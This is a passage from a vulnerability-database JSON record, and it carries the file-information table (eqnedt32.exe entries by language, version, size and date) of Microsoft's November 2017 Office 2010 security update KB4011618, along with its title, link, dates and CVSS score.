width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1033</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1035</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1036</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1037</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1038</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1040</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1041</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" 
width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1042</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1043</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1044</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1045</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1046</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1048</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1049</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" 
width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1050</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1051</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1053</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1054</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1055</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1058</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1060</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" 
width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1061</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1062</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1063</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1081</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1087</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2052</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2070</td><td 
width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2074</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_3082</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr></tbody></table></body></html>", "edition": 4, "modified": "2020-04-16T08:38:26", "id": "KB4011618", "href": "https://support.microsoft.com/en-us/help/4011618/", "published": "2017-11-28T00:00:00", "title": "Description of the security update for Office 2010: November 28, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}